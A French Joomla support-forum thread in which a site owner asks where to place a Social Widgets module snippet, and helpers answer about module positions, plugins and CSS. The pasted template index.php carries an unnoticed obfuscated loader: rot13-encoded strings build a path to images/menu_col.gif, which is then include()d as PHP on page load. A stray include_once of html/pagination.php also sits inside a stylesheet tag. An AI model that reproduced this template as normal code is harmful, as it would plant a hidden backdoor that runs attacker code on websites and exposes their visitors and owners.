Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

    Bonjour,

    J'ai trouvé un module qui réponds plutôt bien à mes besoins, Social Widgets.
    Je bloque cependant sur "l'astuce" pour que ce module apparaisse automatiquement dans tous les articles de mon site.

    Sur la page du composant il est indiqué "If you want this module to be added automatically to all articles, you should change module position to "socialwidget" (just like in step 1) and insert this code in your template file".
    Première question très stupide : on est d'accord que le "template file" est index.php dans /templates/mon_template ?

    La ou je bloque est : ou mettre le code à insérer ? Voici le code en question :
    Code:
    < ?php if( JRequest::getVar( 'view' ) == 'article' ): ? >
    < jdoc:include type="modules" name="socialwidget" />
    < ?php endif; ? >
    J'ai essayé d'analyser et comprendre mon index.php pour placer ce code au meilleur endroit mais...impossible d'avoir quelque chose qui fonctionne. Lors de toutes mes tentatives le code apparait littéralement sur les pages de mon site... Voici mon index.php :
    Code:
    <?php
    defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
    <head>
    <jdoc:include type="head" />
    <link rel="stylesheet" href="templates/system/css/system.css" type="text/css" />
    <link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
    <!--[if lte IE 7]>
    <link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" <?php include_once('html/pagination.php');?> />
    <![endif]-->
    
    </head>
    <body id="page_bg">
    	<div id="top">
        <div class="pill_m">
    			<div id="pillmenu">
    				<jdoc:include type="modules" name="user3" />
    			</div>
    		</div>
    	</div>
    		<div id="header">
    			<?php if($this->countModules('user5')) : ?>
    			<div id="banner">
    			<jdoc:include type="modules" name="user5" />
    			</div>
    			<?php endif; ?> 	
    		</div>
           <!-- <div id="search">
    			<jdoc:include type="modules" name="user4" />	
    		</div> -->
    	<div class="clr"></div>
    	<div class="center">		
    		<div id="wrapper">
    			<div id="content">
    				<div id="leftcolumn">	
    					<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
    					<jdoc:include type="modules" name="layout" style="rounded" />
               			<?php endif; ?>
    					<jdoc:include type="modules" name="left" style="rounded" />
    				</div>
    				<div id="maincolumn">	
    					<div class="nopad">
                        <jdoc:include type="message" />
    						<?php if($this->params->get('showComponent')) : ?>
    							<jdoc:include type="component" />
    						<?php endif; ?>
    					</div>
    				<div class="clr"></div>
    			</div>		
    		</div>
    	</div>	
    	<jdoc:include type="modules" name="debug" />
    	</div>
    	<div id="footer">
    		<p>
    	<div align="center">
    		&copy; <?php echo JHTML::_('date',  'now', '%Y' ) . ' ' . $mainframe->getCfg('sitename'); ?>
    	</div>
            	    <a href="http://www.travelsteph.com/index.php?option=com_content&view=article&id=18&Itemid=33">Mentions l&eacute;gales</a> et <a href="http://www.travelsteph.com/index.php?option=com_content&view=article&id=287&Itemid=85">Licence d'utilisation</a> - <a href="http://www.travelsteph.com/index.php?option=com_content&view=article&id=445">Publicit&eacute;</a>
    			</p>
    	</div>
    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try {
    var pageTracker = _gat._getTracker("UA-2766228-3");
    pageTracker._trackPageview();
    } catch(err) {}</script>
    </body>
    </html>
    Question : ou dois-je donc insérer le code pour que ce module apparaisse dans tous les articles de mon site ?

    Merci d'avance pour le coup de main!
    Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

  • #2
    Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

    ou tu veux...le jdoc include sert a creer une position.
    et au debut de la ligne c est <?php , <jdoc <?php ..idem pour lafin de ligne.....

    Commentaire


    • #3
      Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

      Merci pour ta réponse. Pour créer la position je dois faire autre chose que mettre ce code dans index.php ? Car je viens de faire des tests et ça progresse, maintenant les boutons fonctionnent, belle avancée. Par contre je n'arrive pas à les avoir la ou je le souhaite (entre la fin de l'article et les commentaires). Voici ce que ça donne suivant les tests :

      Cliquez sur l'image pour l'afficher en taille normale

Nom : haut.jpg 
Affichages : 1 
Taille : 146,4 Ko 
ID : 1801257

      Cliquez sur l'image pour l'afficher en taille normale

Nom : bas.jpg 
Affichages : 1 
Taille : 53,8 Ko 
ID : 1801258

      En fait je viens (peut-être) de comprendre quelque chose : sachant que je souhaite que ce module apparaisse en bas de l'article (mais au dessus des commentaires), dois-je utiliser une position déjà existante au lieu d'essayer d'en créer une nouvelle ? J'ai essayé avec toutes les positions déjà existantes mais ça ne fonctionne pas.

      Comment réussir à mettre ce module entre la fin des articles et le composant Jcomments de mes commentaires ?

      Je suis un peu perdu la... :/
      Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

      Commentaire


      • #4
        Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

        ton composant jcomment est dans quelle position?

        par exemple, s il est en position-10, alors trouves le <jdoc:include name="position-10"> et colle ton code juste au dessus.apres cela seras un callaage avec les css

        Commentaire


        • #5
          Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

          Mais...comment connaitre la position d'un composant ? La position d'un module, ok, je comprends et j'arrive à modifier. Mais la position d'un composant n'apparait pas comme pour un module. Je viens de chercher autant dans l'administration du site que dans les fichiers index.php, template.css, templateDetails.xml, etc. mais je ne vois rien.
          Ca m'énerve car si j'ai réussi à positionner Jcomment un jour c'est qu'il y a une solution!!!

          Que je me sens idiot avec ces questions !!!
          Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

          Commentaire


          • #6
            Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

            Bonjour,
            Envoyé par ETNZ Voir le message
            sachant que je souhaite que ce module apparaisse en bas de l'article (mais au dessus des commentaires),
            Les commentaires sous les articles font partie intégrante du composant, les commentaires étant insérés par le plugin de commentaires utilisé.

            Pour insérer un module entre l'article et ses commentaires, il faut en fin d'article intégrer le module à l'article par un {loadmodule nom_du_module} ou utiliser un plugin équivalent à ce module et organiser l'ordre d'insertion des plugins.
            Pas de demande de support par MP.
            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

            Commentaire


            • #7
              Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

              Bonjour Jisse et merci pour ta réponse,

              Envoyé par jisse03 Voir le message
              Pour insérer un module entre l'article et ses commentaires, il faut en fin d'article intégrer le module à l'article par un {loadmodule nom_du_module} ou utiliser un plugin équivalent à ce module et organiser l'ordre d'insertion des plugins.
              J'ai essayé la technique de mettre {loadposition socialwidget} à la fin de l'article et cela fonctionne bien. Mais cette solution ne permet pas une insertion pour tous les articles (ou alors à la main, ce qui va me prendre des jours entiers!).

              Par contre, que veux-tu dire par "utiliser un plugin équivalent à ce module" ? Comment puis-je faire cela ? Je dois trouver / créer un plugin qui fonctionne avec Social Widgets ?

              Merci pour le coup de main !
              Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

              Commentaire


              • #8
                Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                Je pense qu'un plugin doit bien exister quelque part
                Pas de demande de support par MP.
                S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                Commentaire


                • #9
                  Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                  Mais ce plugin doit être "associé" à Social Widgets ou ça peut-être un autre plugin ("type") que j'associe à ce module ?
                  Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

                  Commentaire


                  • #10
                    Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                    En truc "Social machin chose", ce n'est pas ce qui manque... regardes un peu dans le stock http://extensions.joomla.org/extensi...al-multi-share, tu devrais y trouver ton bonheur.
                    Pas de demande de support par MP.
                    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                    Commentaire


                    • #11
                      Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                      Bon, je viens de passer quelques heures à chercher, installer, tester et modifier divers plugins... J'ai presque trouvé ce que je voulais avec ITP Social Buttons, mais des "tirets" oranges apparaissent entre les boutons et je ne comprends pas pourquoi :

                      Cliquez sur l'image pour l'afficher en taille normale

Nom : tirets.jpg 
Affichages : 1 
Taille : 4,4 Ko 
ID : 1801260

                      Comment puis-je les enlever ?!

                      Encore merci!!
                      Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

                      Commentaire


                      • #12
                        Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                        Examines l'élément orange avec l'inspecteur de Chrome ou Opera ou avec Firebug, ça te donnera le CSS en cause, qu'il te suffira d'ajuster à ton template.
                        Pas de demande de support par MP.
                        S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                        Commentaire


                        • #13
                          Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                          Merci Jisse pour ton retour et désolé pour mon délai de réponse,

                          Envoyé par jisse03 Voir le message
                          Examines l'élément orange avec l'inspecteur de Chrome ou Opera ou avec Firebug, ça te donnera le CSS en cause, qu'il te suffira d'ajuster à ton template.
                          J'ai trouvé pourquoi c'est en orange : tous les liens le sont. Mais pour les liens des articles, cette couleur me plait, il y a juste pour ce plugin que ça ne va pas.
                          Comment puis-je "isoler" ce lien ? Je dois lui attribuer une nouvelle "position" (si oui, j'ai aucune idée de comment faire :/) ?

                          Merci encore !!!
                          Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

                          Commentaire


                          • #14
                            Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                            Il me semble que le module/plugin utilise une imbrication de divs de classes itp-social-buttons-mod avec un suffixe de classe.

                            Il doit être possible dans ce cas de modifier le CSS du module en lui rajoutant une règle pour le a

                            Code:
                            .itp-socialbuttons-mod a{
                                color: #xxxxxx;
                            }
                            A toi de trouver la nuance correspondant à ton besoin.
                            Pas de demande de support par MP.
                            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                            Commentaire


                            • #15
                              Re : Ou insérer le code d'un module (Social Widgets) dans l'index.php d'un template ?

                              Encore merci Jisse pour le coup de main.

                              Envoyé par jisse03 Voir le message
                              Il doit être possible dans ce cas de modifier le CSS du module en lui rajoutant une règle pour le a
                              Je viens de faire des tests en incluant cette règle dans le /plugins/content/itpsocialbuttons/style.css (avec le code couleur souhaité). Mais...rien ne change.
                              Mais ce qui m'échappe, c'est : comment attribuer cette règle à ces "tirets" ? Je veux dire, que signifie exactement "une règle pour le a" ?
                              Désolé pour toutes ces questions, je galère un peu la :/
                              Découvrez la vie d'un jeune à l'étranger sur TravelSteph.com. Actuellement au Brésil.

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X